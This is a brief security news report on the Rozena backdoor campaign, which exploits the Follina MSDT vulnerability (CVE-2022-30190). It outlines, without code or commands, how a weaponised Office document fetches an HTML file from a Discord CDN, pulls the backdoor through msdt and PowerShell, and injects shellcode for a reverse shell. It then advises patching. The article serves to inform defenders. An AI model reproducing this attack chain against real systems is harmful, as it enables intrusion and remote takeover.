A research group have discovered a phishing operation called Rozena that exploits the recently disclosed Follina critical security flaw (CVE-2022-30190). Based on reports, the malicious threat actors are distributing the Rozena backdoor to targeted Windows systems.
The researchers disclosed that Rozena is a type of backdoor that accesses a remote shell connection that connects back to its malware operator. In addition, a completed linkage can impact all systems connected to the network.
According to an analysis executed by a separate researcher, the Rozena malware campaign abuses the Follina critical vulnerability. As of now, the flaw is known as a remote code execution (RCE) exploit that is present in the Microsoft Windows Support Diagnostic Tool (MSDT).
The attack sequence abuses a weaponised Office document that, if a target clicks, will connect to an external Discord CDN URL. This method is for the hackers to acquire an HTML file coded as index[.]htm.
After obtaining an HTML file, it will use the msdt[.]exe kit and the PowerShell command invoke another web request to get the Rozena backdoor. Subsequently, the backdoor will be stored and presented as a Word document (Word[.]exe).
The Rozena backdoor might have been aiming to take full advantage of its targeted system.
Some researchers believed that the main objective of the Rozena malware campaign was to inject shellcode into the targeted system to execute a reverse shell into their device.
Unfortunately for a victim, the threat actors can take over the targeted system if the shellcode is successfully injected. Automatically, the adversary can execute any malicious activity on their device, such as performing a payload.
Once the Rozena payload is initiated, it can develop a process for a PowerShell command. Based on the experts’ observations, the decoded command can only execute one purpose: inject the shellcode.
Several malicious threat groups have constantly abused the Follina critical flaw to execute their cybercriminal activities. Fortunately, there is an available patch to fix the flaw, and experts suggest that users apply this update to eliminate the chance of getting impacted by this exploit.
